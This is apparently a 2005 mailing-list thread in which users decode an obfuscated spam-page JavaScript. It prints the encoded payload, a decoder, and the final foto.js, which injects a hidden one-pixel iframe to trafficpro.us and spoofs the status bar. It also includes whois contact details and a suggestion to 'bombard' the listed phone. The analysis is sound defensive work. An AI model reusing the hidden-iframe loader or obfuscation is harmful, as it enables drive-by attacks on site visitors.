Re: decyphering spam
It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number [EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less Domain Name: TRAFFICPRO.US Domain ID: D7444563-US Sponsoring Registrar:SCHLUND + PARTNER AG Domain Status: ok Registrant ID: SPAG-4476 Registrant Name: Julie Prescott Registrant Address1: Orchard Terrace Registrant Address2: 8 Registrant City: York Registrant Postal Code: YO51 9AF Registrant Country: Great Britain (UK) Registrant Country Code: GB Registrant Phone Number: +44.1614315155 Registrant Email:[EMAIL PROTECTED] Registrant Application Purpose: P1 Registrant Nexus Category: C11 Administrative Contact ID: SPAG-4476 Administrative Contact Name: Julie Prescott Administrative Contact Address1: Orchard Terrace Administrative Contact Address2: 8 Administrative Contact City: York Administrative Contact Postal Code: YO51 9AF Administrative Contact Country: Great Britain (UK) Administrative Contact Country Code: GB Administrative Contact Phone Number: +44.1614315155 {etc} -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
michael wrote: It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number Or perhaps do a little research first? The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight http://www.touchstockport.com/business/list/bid/2964798 The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace. http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000 Cheers, Dave [EMAIL PROTECTED]:/tmp$ whois trafficpro.us |less Domain Name: TRAFFICPRO.US Domain ID: D7444563-US Sponsoring Registrar:SCHLUND + PARTNER AG Domain Status: ok Registrant ID: SPAG-4476 Registrant Name: Julie Prescott Registrant Address1: Orchard Terrace Registrant Address2: 8 Registrant City: York Registrant Postal Code: YO51 9AF Registrant Country: Great Britain (UK) Registrant Country Code: GB Registrant Phone Number: +44.1614315155 Registrant Email:[EMAIL PROTECTED] Registrant Application Purpose: P1 Registrant Nexus Category: C11 Administrative Contact ID: SPAG-4476 Administrative Contact Name: Julie Prescott Administrative Contact Address1: Orchard Terrace Administrative Contact Address2: 8 Administrative Contact City: York Administrative Contact Postal Code: YO51 9AF Administrative Contact Country: Great Britain (UK) Administrative Contact Country Code: GB Administrative Contact Phone Number: +44.1614315155 {etc} -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote: michael wrote: It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number Or perhaps do a little research first? The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight http://www.touchstockport.com/business/list/bid/2964798 The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace. http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750width=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovtype=zm=0in.x=6in.y=11scale=5000 I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping! I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On Friday 03 June 2005 10:19, michael wrote: On Fri, 2005-06-03 at 10:05 +0100, Dave Howorth wrote: michael wrote: It seems this spam leads to trafficpro.us which is registered by somebody in UK (see below) - do you think it's worth reporting or taking legal action? I guess we could just bombard their phone number Or perhaps do a little research first? The registrant claims to be in York. The phone number is nowhere near York. It apparently belongs to a company in Stockport called Railweight http://www.touchstockport.com/business/list/bid/2964798 The postcode YO51 9AF isn't in York either and isn't on Orchard Terrace. http://www.multimap.com/map/browse.cgi?client=publicX=439500Y=466750wi dth=700height=400gride=439511gridn=466700srec=0coordsys=gbdb=pcaddr 1=addr2=addr3=pc=advanced=local=localinfosel=kw=inmap=table=ovty pe=zm=0in.x=6in.y=11scale=5000 I did read it and wonder about the phone number being Manchester, even rang it up but only heard gossiping! I guess you're implying that trafficpro.us have fake 'whois' credentials? In which case should a complaint be made to nominet (other?) to get their domain removed? Nominet are not responsible for .us, only .uk. The registrar seems to be someone in Germany. David -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
decyphering spam
how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? html head body bgcolor=#080C25 script language=javascriptdocument.write(unescape('%3C%53%43%52%49%50% 54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E% 64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27% 29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75% 61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F% 6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28% 73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B% 20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C% 65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D% 43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69% 29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29% 29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70% 65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74% 3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script /body /html -- Michael Bane Atmospheric Physics Group University of Manchester -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
michael wrote: how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? Personally, I used Python's urllib.unquote and got the following: SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript language=javascriptfunction dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivolant decoder for that section. Maybe someone else will jump in? :D -- Steve C. Lamb | I'm your priest, I'm your shrink, I'm your PGP Key: 8B6E99C5 | main connection to the switchboard of souls. ---+- signature.asc Description: OpenPGP digital signature
Re: decyphering spam
On Thu, 02 Jun 2005 21:18:47 +0100 michael [EMAIL PROTECTED] wrote: how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? html head body bgcolor=#080C25 script language=javascriptdocument.write(unescape('%3C%53%43%52%49%50% 54%20%4C%41%4E%47%55%41%47%45%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E% 64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%65%6D%70%74%79%2E%2E%27% 29%3B%3C%2F%53%43%52%49%50%54%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75% 61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F% 6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28% 73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B% 20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C% 65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D% 43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69% 29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29% 29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70% 65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74% 3E'));dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script Each of the %xy groups is a % followed by a byte described in hexadecimal. A little Perl or Python script should be able to decipher it for you pretty quick. -- - Ron Johnson, Jr. Jefferson, LA USA PGP Key ID 8834C06B I prefer encrypted mail. Observe good faith and justice toward all nations. Cultivate peace and harmony with all. George Washington -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: decyphering spam
On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote: michael wrote: how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? Personally, I used Python's urllib.unquote and got the following: SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript language=javascriptfunction dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivolant decoder for that section. Maybe someone else will jump in? :D That final segment decodes to this: SCRIPT LANGUAGE=javascript SRC=foto.js // SAMPLE SCRIPT #2 - CALLING AN EXTERNAL JS FILE /SCRIPT which, unless there was a base reference issued in the actual spam, leads nowhere. :) -- ~ Darryl ~ [EMAIL PROTECTED] http://smartssa.com / http://darrylclarke.com
Re: decyphering spam
On Thursday June 2 2005 22:18, michael wrote: how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? First, you shove it through that Perl script with the line intact (isn't downloading Videos from secure pages fun...): #!/usr/bin/perl -w use strict; foreach (STDIN) { s/\%([0-9a-fA-F]{1,2})/print STDOUT chr(hex($1))/ge; } Afterwards, you search the resulting JavaScript fragment for what the dF function actually does. It decodes to this: SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPT script language=javascript function dF(s){ var s1=unescape(s.substr(0,s.length-1)); var t= ''; for(i=0;is1.length;i++) t += String.fromCharCode( s1.charCodeAt(i)-s.substr(s.length-1,1) ); document.write(unescape(t));} /script{] Have fun. I found that it's actually pretty simple to just re-implement whatever it does in a programming language of your choice and just dump everything to stdout. -- Got Backup? Jabber: Shadowdancer at jabber.fsinf.de pgp8iuOCMYIkQ.pgp Description: PGP signature
Re: decyphering spam
On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote: On 6/2/05, Steve Lamb [EMAIL PROTECTED] wrote: michael wrote: how do i decypher what the following HTML/javascript attempts (original 'write' was all one line)? Personally, I used Python's urllib.unquote and got the following: SCRIPT LANGUAGE=javascriptdocument.write('empty..');/SCRIPTscript language=javascriptfunction dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;is1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}/script dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')/script Which is then fed the above segment to decode. Don't feel like digging into the above javascript to make a Python equivolant decoder for that section. Maybe someone else will jump in? :D That final segment decodes to this: SCRIPT LANGUAGE=javascript SRC=foto.js // SAMPLE SCRIPT #2 - CALLING AN EXTERNAL JS FILE /SCRIPT which, unless there was a base reference issued in the actual spam, leads nowhere. :) well i can 'wget' the foto.js from the site which is (if anybody is interested!) a bit too simple to decode but those up for the challenge could decypher the index.php url = http://www.trafficpro.us/index.php;; qwe = ' di'+'spl'+'ay:n'+'one'+';}/s'+'ty'+'le'; rty = ' FR'+'AMEB'+'ORD'+'ER=0 WIDTH=1 HEIGHT=1'+'0% /I'+'F'+'RA'+'ME'; uio = 's'+'tyl'+'e type=text/css'; asd = 'IF'+'RA'+'ME SRC='; fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;'; a = asd+url+rty; b = uio+fgh+qwe; document.write (a); document.write (b); self.focus(); setInterval(window.status='google.com',7); -- ~ Darryl ~ [EMAIL PROTECTED] http://smartssa.com / http://darrylclarke.com -- Michael Bane Atmospheric Physics Group University of Manchester -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]